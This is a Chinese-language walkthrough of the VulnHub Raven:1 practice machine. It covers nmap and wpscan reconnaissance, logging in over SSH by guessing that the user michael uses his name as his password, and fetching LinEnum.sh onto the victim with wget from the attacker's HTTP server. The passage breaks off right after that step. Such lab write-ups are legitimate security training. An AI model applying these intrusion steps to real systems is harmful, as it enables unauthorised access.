vulnhub靶机渗透[Raven-1]

名称

名称：Raven：1
发布日期：2018年8月14日

下载

• Download: https://drive.google.com/open?id=1pCFv-OXmknLVluUu_8ZCDr1XYWPDfLxW
• Download (Mirror): https://download.vulnhub.com/raven/Raven.ova
• Download (Torrent): https://download.vulnhub.com/raven/Raven.ova.torrent

描述

Raven是初学者/中级boot2root计算机。有四个flag可以找到，并且有两个预期的root方法。使用VMware构建并在Virtual Box上进行了测试。设置为使用NAT网络。

信息收集

上nmap

root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.118
Host is up (0.00016s latency).
MAC Address: 08:00:27:D2:E6:4F (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -p- -sV -v -Pn 192.168.56.118
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
36286/tcp open  status  1 (RPC #100024)

root@kali:~# nmap -p- -sU -Pn -v 192.168.56.118 --min-rate=10000
PORT    STATE SERVICE
111/udp open  rpcbind

root@kali:~# nmap -p 22,80,111,36286 -sV -v -Pn -A --script all 192.168.56.118 --min-rate=100000
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| ssh-auth-methods: 
|   Supported authentication methods: 
|     publickey
|_    password
| ssh-brute: 
|   Accounts: No valid accounts found
|_  Statistics: Performed 0 guesses in 1807 seconds, average tps: 0.0
| ssh-hostkey: 
|   1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
|   2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
|   256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_  256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
| ssh-publickey-acceptance: 
|_  Accepted Public Keys: No public keys accepted
|_ssh-run: Failed to specify credentials and command to run.
| ssh2-enum-algos: 
|   kex_algorithms: (6)
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (4)
|       ssh-rsa
|       ssh-dss
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|       chacha20-poly1305@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-brute:   
|_  Path "/" does not require authentication
|_http-chrono: Request times for /; avg: 284.71ms; min: 236.36ms; max: 327.61ms
| http-comments-displayer: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.118
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 16
|     Comment: 
|         <!-- Site Title -->
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 112
|     Comment: 
|         
|         
|          */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 3425
|     Comment: 
|         /*
|         ################
|                        End Blog Details  Page style
|         ################
|         */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 1989
|     Comment: 
|         /* Nav Menu Essentials */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 2028
|     Comment: 
|         /* Nav Menu Arrows */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 10
|     Comment: 
|         /* Code for Firefox */
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 196
|     Comment: 
|         <!-- Start team Area -->
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 81
|     Comment: 
|         
|         
|          */
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 12
|     Comment: 
|         <!-- Meta Keyword -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 150
|     Comment: 
|         <!-- #colophon -->
|     
|     Path: http://192.168.56.118:80/js/jquery.counterup.min.js
|     Line number: 1
|     Comment: 
|         /*!
|         * jquery.counterup.js 1.0
|         *
|         * Copyright 2013, Benjamin Intal http://gambit.ph @bfintal
|         * Released under the GPL v2 License
|         *
|         * Date: Nov 26, 2013
|         */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 106
|     Comment: 
|         /**
|          *  Typography
|          *
|          **/
|     
|     Path: http://192.168.56.118:80/js/waypoints.min.js
|     Line number: 2
|     Comment: 
|         /*
|         jQuery Waypoints - v2.0.3
|         Copyright (c) 2011-2013 Caleb Troughton
|         Dual licensed under the MIT license and GPL license.
|         https://github.com/imakewebthings/jquery-waypoints/blob/master/licenses.txt
|         */
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 15
|     Comment: 
|          // request type html/json/xml
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 4
|     Comment: 
|         <!-- Mobile Specific Meta -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 1
|     Comment: 
|         /*--------------------------- Color variations ----------------------*/
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 7
|     Comment: 
|         /*  Basic Style 
|         /* =================================== */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 47
|     Comment: 
|         /* Microsoft Edge */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 2208
|     Comment: 
|         /* Mobile Nav body classes */
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 107
|     Comment: 
|         <!-- #main -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 2057
|     Comment: 
|         /* Nav Meu Styling */
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 75
|     Comment: 
|         <!-- .site-branding -->
|     
|     Path: http://192.168.56.118:80/contact.php
|     Line number: 148
|     Comment: 
|         <!-- End contact-page Area -->
|     
|     Path: http://192.168.56.118:80/index.html
|     Line number: 291
|     Comment: 
|         <!-- End galery Area -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 156
|     Comment: 
|         /* ]]> */
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 129
|     Comment: 
|         
|         
|          */
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 154
|     Comment: 
|         /* <![CDATA[ */
|     
|     Path: http://192.168.56.118:80/js/jquery.sticky.js
|     Line number: 8
|     Comment: 
|         
|         // Website: http://labs.anthonygarand.com/sticky
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 152
|     Comment: 
|         <!-- #page -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 34
|     Comment: 
|         /* Mozilla Firefox 19+ */
|     
|     Path: http://192.168.56.118:80/js/superfish.min.js
|     Line number: 1
|     Comment: 
|         /*
|          * jQuery Superfish Menu Plugin - v1.7.9
|          * Copyright (c) 2016 Joel Birch
|          *
|          * Dual licensed under the MIT and GPL licenses:
|          *    http://www.opensource.org/licenses/mit-license.php
|          *    http://www.gnu.org/licenses/gpl.html
|          */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 4
|     Comment: 
|         /* Mobile Layout: 320px */
|     
|     Path: http://192.168.56.118:80/js/jquery.sticky.js
|     Line number: 6
|     Comment: 
|         
|         // Created: 2/14/2011
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 27
|     Comment: 
|         /* Mozilla Firefox 4 to 18 */
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 141
|     Comment: 
|         <!-- #content -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 80
|     Comment: 
|         <!-- #masthead -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 137
|     Comment: 
|         <!-- #secondary -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 105
|     Comment: 
|         <!-- #post-## -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 108
|     Comment: 
|         <!-- #primary -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 102
|     Comment: 
|         <!-- .entry-content -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 97
|     Comment: 
|         <!-- .entry-header -->
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 16
|     Comment: 
|          // serialize form data
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 6
|     Comment: 
|         /* =================================== */
|     
|     Path: http://192.168.56.118:80/index.html
|     Line number: 210
|     Comment: 
|         <!-- End feature Area -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 3
|     Comment: 
|         /* Tablet Layout: 768px */
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 77
|     Comment: 
|         /* No Js */
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 118
|     Comment: 
|         
|         
|          */
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 77
|     Comment: 
|         <!-- .custom-header -->
|     
|     Path: http://192.168.56.118:80/js/jquery.sticky.js
|     Line number: 140
|     Comment: 
|          // should be more efficient than using $window.scroll(scroller) and $window.resize(resizer):
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 21
|     Comment: 
|         /* WebKit, Blink, Edge */
|     
|     Path: http://192.168.56.118:80/js/jquery.magnific-popup.min.js
|     Line number: 1
|     Comment: 
|         /*! Magnific Popup - v1.1.0 - 2016-02-20
|         * http://dimsemenov.com/plugins/magnific-popup/
|         * Copyright (c) 2016 Dmitry Semenov; */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 2
|     Comment: 
|         /* Medium Layout: 1280px */
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 70
|     Comment: 
|         <!-- .site-branding-text -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 14
|     Comment: 
|         <!-- meta character set -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 269
|     Comment: 
|         <!-- start footer Area -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 41
|     Comment: 
|         /* Internet Explorer 10-11 */
|     
|     Path: http://192.168.56.118:80/css/linearicons.css
|     Line number: 22
|     Comment: 
|         /* Better Font Rendering =========== */
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 74
|     Comment: 
|         <!-- start banner Area -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 39
|     Comment: 
|         <!--[if lt IE 9]>
|         <script type='text/javascript' src='http://raven.local/wordpress/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=3.7.3'></script>
|         <![endif]-->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 36
|     Comment: 
|         <!--[if lt IE 9]>
|         <link rel='stylesheet' id='twentyseventeen-ie8-css'  href='http://raven.local/wordpress/wp-content/themes/twentyseventeen/assets/css/ie8.css?ver=1.0' type='text/css' media='all' />
|         <![endif]-->
|     
|     Path: http://192.168.56.118:80/js/jquery.nice-select.min.js
|     Line number: 1
|     Comment: 
|         /*  jQuery Nice Select - v1.0
|             https://github.com/hernansartorio/jquery-nice-select
|             Made by Hern\xC3\xA1n Sartorio  */
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 6
|     Comment: 
|         
|         
|          */
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 97
|     Comment: 
|         <!-- .entry-meta -->
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 29
|     Comment: 
|         /* fix for flashing background */
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 13
|     Comment: 
|         /* position relative and z-index fix webkit rendering fonts issue */
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 2101
|     Comment: 
|         /* Mobile Nav Toggle */
|     
|     Path: http://192.168.56.118:80/index.html
|     Line number: 368
|     Comment: 
|         <!-- End blog Area -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 20
|     Comment: 
|         <!--
|                               CSS
|                               ============================================= -->
|     
|     Path: http://192.168.56.118:80/js/parallax.min.js
|     Line number: 1
|     Comment: 
|         /*!
|          * parallax.js v1.5.0 (http://pixelcog.github.io/parallax.js/)
|          * @copyright 2016 PixelCog, Inc.
|          * @license MIT (https://github.com/pixelcog/parallax.js/blob/master/LICENSE)
|          */
|     
|     Path: http://192.168.56.118:80/js/jquery.ajaxchimp.min.js
|     Line number: 103
|     Comment: 
|          // Translate and display submit message
|     
|     Path: http://192.168.56.118:80/js/jquery.ajaxchimp.min.js
|     Line number: 69
|     Comment: 
|          // Translate and display message
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 151
|     Comment: 
|         <!-- .site-content-contain -->
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 10
|     Comment: 
|          // prevent default form submit
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 148
|     Comment: 
|         <!-- .site-info -->
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 23
|     Comment: 
|          // reset form
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 22
|     Comment: 
|          // fade in response data
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 14
|     Comment: 
|          // form submit method get/post
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 10
|     Comment: 
|         <!-- Meta Description -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 68
|     Comment: 
|         <!-- #nav-menu-container -->
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 19
|     Comment: 
|          // change submit button text
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 167
|     Comment: 
|         /**
|          * For modern browsers
|          * 1. The space content is one way to avoid an Opera bug when the
|          *    contenteditable attribute is included anywhere else in the document.
|          *    Otherwise it causes space to appear at the top and bottom of elements
|          *    that are clearfixed.
|          * 2. The use of `table` rather than `block` is only necessary if using
|          *    `:before` to contain the top-margins of child elements.
|          */
|     
|     Path: http://192.168.56.118:80/index.html
|     Line number: 150
|     Comment: 
|         <!-- Start feature Area -->
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 13
|     Comment: 
|          // form action url
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 280
|     Comment: 
|         <!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
|     
|     Path: http://192.168.56.118:80/js/jquery.sticky.js
|     Line number: 4
|     Comment: 
|         
|         // Improvements by German M. Bravo (Kronuz) and Ruud Kamphuis (ruudk)
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 8
|     Comment: 
|          // form submit event
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 90
|     Comment: 
|         <!-- Start about-top Area -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 167
|     Comment: 
|         <!-- Start fact Area -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 111
|     Comment: 
|         <!-- Start service Area -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 3306
|     Comment: 
|         /*
|         ################
|                        Start Blog Details  Page style
|         ################
|         */
|     
|     Path: http://192.168.56.118:80/contact.php
|     Line number: 89
|     Comment: 
|         <!-- Start contact-page Area -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 3301
|     Comment: 
|         /*
|         ################
|                        End Blog Home  Page style
|         ################
|         */
|     
|     Path: http://192.168.56.118:80/css/owl.carousel.css
|     Line number: 1
|     Comment: 
|         
|         
|         
|         
|          */
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 4
|     Comment: 
|          // contact form
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 8
|     Comment: 
|         <!-- Author Meta -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 267
|     Comment: 
|         <!-- End team Area -->
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Line number: 74
|     Comment: 
|         <!-- .wrap -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 2046
|     Comment: 
|         /* Nav Meu Container */
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 165
|     Comment: 
|         <!-- End service Area -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 5
|     Comment: 
|         /* Wide Mobile Layout: 480px */
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 5
|     Comment: 
|          // submit button
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 318
|     Comment: 
|         <!-- End footer Area -->
|     
|     Path: http://192.168.56.118:80/js/jquery.sticky.js
|     Line number: 2
|     Comment: 
|         
|         // =============
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 110
|     Comment: 
|         <!-- End about-top Area -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 194
|     Comment: 
|         <!-- end fact Area -->
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 1
|     Comment: 
|          // -------   Mail Send ajax
|     
|     Path: http://192.168.56.118:80/js/jquery.sticky.js
|     Line number: 10
|     Comment: 
|         
|         //       It will only set the 'top' and 'position' of your element, you
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 3065
|     Comment: 
|         /*
|         ################
|                        Start Blog Home  Page style
|         ################
|         */
|     
|     Path: http://192.168.56.118:80/css/bootstrap.css
|     Line number: 1
|     Comment: 
|         /*!
|          * Bootstrap v4.0.0-beta (https://getbootstrap.com)
|          * Copyright 2011-2017 The Bootstrap Authors
|          * Copyright 2011-2017 Twitter, Inc.
|          * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
|          */
|     
|     Path: http://192.168.56.118:80/index.html
|     Line number: 293
|     Comment: 
|         <!-- Start blog Area -->
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 1875
|     Comment: 
|         /*--------------------------------------------------------------
|         # Header
|         --------------------------------------------------------------*/
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 2130
|     Comment: 
|         /* Mobile Nav Styling */
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 6
|     Comment: 
|         <!-- Favicon-->
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 6
|     Comment: 
|          // alert div for show alert message
|     
|     Path: http://192.168.56.118:80/css/main.css
|     Line number: 1986
|     Comment: 
|         /*--------------------------------------------------------------
|         # Navigation Menu
|         --------------------------------------------------------------*/
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 71
|     Comment: 
|         <!-- #header -->
|     
|     Path: http://192.168.56.118:80/about.html
|     Line number: 88
|     Comment: 
|         <!-- End banner Area -->
|     
|     Path: http://192.168.56.118:80/js/mail-script.js
|     Line number: 24
|     Comment: 
|          // reset submit button text
|     
|     Path: http://192.168.56.118:80/index.html
|     Line number: 241
|     Comment: 
|_        <!-- Start galery Area -->
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.118
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.118:80/
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.118:80/contact.php
|     Form id: myform
|     Form action: 
|     
|     Path: http://192.168.56.118:80/contact.php
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.118:80/team.html
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.118:80/index.html
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.118:80/about.html
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.56.118:80/wordpress/
|     Form id: search-form-5e446a40901ba
|_    Form action: http://raven.local/wordpress/
|_http-date: Wed, 12 Feb 2020 21:12:24 GMT; +8h00m00s from local time.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wordpress/: Blog
|   /wordpress/wp-login.php: Wordpress login page.
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /manual/: Potentially interesting folder
|_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| http-errors: 
| Spidering limited to: maxpagecount=40; withinhost=192.168.56.118
|   Found the following error pages: 
|   
|   Error Code: 404
|       http://192.168.56.118:80/blog-single.html
|   
|   Error Code: 404
|       http://192.168.56.118:80/contact.html
|   
|   Error Code: 404
|_      http://192.168.56.118:80/wordpress/%5c%22
|_http-feed: ERROR: Script execution failed (use -d to debug)
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-grep: 
|   (1) http://192.168.56.118:80/contact.php: 
|     (1) email: 
|       + support@codethemes.com
|   (1) http://192.168.56.118:80/blog-single.html: 
|     (1) ip: 
|_      + 192.168.56.118
| http-headers: 
|   Date: Wed, 12 Feb 2020 21:12:23 GMT
|   Server: Apache/2.4.10 (Debian)
|   Last-Modified: Sun, 12 Aug 2018 22:29:32 GMT
|   ETag: "41b3-5734482bdcb00"
|   Accept-Ranges: bytes
|   Content-Length: 16819
|   Vary: Accept-Encoding
|   Connection: close
|   Content-Type: text/html
|   
|_  (Request type: HEAD)
|_http-malware-host: Host appears to be clean
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-mobileversion-checker: No mobile version detected.
| http-referer-checker: 
| Spidering limited to: maxpagecount=30
|_  https://cdnjs.cloudflare.com:443/ajax/libs/popper.js/1.12.9/umd/popper.min.js
|_http-security-headers: 
| http-sitemap-generator: 
|   Directory structure:
|     /
|       Other: 1; html: 1
|     /css/
|       css: 6
|     /img/
|       jpg: 4; png: 1
|     /js/
|       js: 5
|     /wordpress/
|       Other: 1
|   Longest directory structure:
|     Depth: 1
|     Dir: /css/
|   Total files found (by extension):
|_    Other: 2; css: 6; html: 1; jpg: 4; js: 5; png: 1
|_http-slowloris: false
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Raven Security
| http-traceroute: 
|_  Possible reverse proxy detected.
| http-useragent-tester: 
|   Status for browser useragent: 200
|   Allowed User Agents: 
|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
|     libwww
|     lwp-trivial
|     libcurl-agent/1.0
|     PHP/
|     Python-urllib/2.5
|     GT::WWW
|     Snoopy
|     MFC_Tear_Sample
|     HTTP::Lite
|     PHPCrawl
|     URI::Fetch
|     Zend_Http_Client
|     http client
|     PECL::HTTP
|     Wget/1.13.4 (linux-gnu)
|_    WWW-Mechanize/1.34
| http-vhosts: 
| 126 names had status 200
|_ftp0
|_http-xssed: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36286/tcp   status
|   100024  1          43516/udp   status
|   100024  1          46344/udp6  status
|_  100024  1          56752/tcp6  status
36286/tcp open  status  1 (RPC #100024)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

将攻击机的hosts文件中添加

192.168.56.118 raven.local

访问下面的url发现该站点是wordpress搭建的

http://192.168.56.118/wordpress/

因此，想到的第一个想法是运行wpscan并查看该扫描所枚举的内容。

root@kali:~/vulnhub/raven1# wpscan --url http://192.168.56.118/wordpress/ --wp-content-dir -ep -et -eu
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.118/wordpress/
[+] Started: Fri Feb 14 04:34:24 2020

Interesting Finding(s):

[+] http://192.168.56.118/wordpress/
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.56.118/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.118/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.56.118/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.118/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.7'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.118/wordpress/, Match: 'WordPress 4.8.7'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] michael
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] steven
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

结果返回了在受害人机器上创建的2位用户：

Michael and Steven

getshell

继续在同一端口上进行操作,尝试使用端口22（SSH）。将用户名和密码也使用相同的单词是一种非常合乎逻辑的“尝试”方法。使用“michael”作为用户名和密码登录到SSH并成功进入Shell！

root@kali:~# ssh michael@192.168.56.118
The authenticity of host '192.168.56.118 (192.168.56.118)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.118' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa': 
michael@192.168.56.118's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:~$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
michael@Raven:~$ whoami
michael

然后，将目录更改为/tmp并导入了LinEnum.sh，该脚本用于枚举许多基本和高级Linux详细信息。它托管在本地计算机上的文件夹中，并使用wget命令导入到受害者计算机中。

root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.56.1 - - [14/Feb/2020 04:45:37] "GET / HTTP/1.1" 200 -
192.168.56.1 - - [14/Feb/2020 04:45:41] "GET /LinEnum.sh HTTP/1.1" 200 -
192.168.56.118 - - [14/Feb/2020 04:46:02] "GET /LinEnum.sh HTTP/1.1" 200 -

michael@Raven:/tmp$ wget 192.168.56.102:8000/LinEnum.sh
--2020-02-15 04:46:01--  http://192.168.56.102:8000/LinEnum.sh
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46476 (45K) [text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh                     100%[=====================================================>]  45.39K  --.-KB/s   in 0s     

2020-02-15 04:46:01 (470 MB/s) - ‘LinEnum.sh’ saved [46476/46476]

michael@Raven:/tmp$ chmod 777 *
michael@Raven:/tmp$ ls
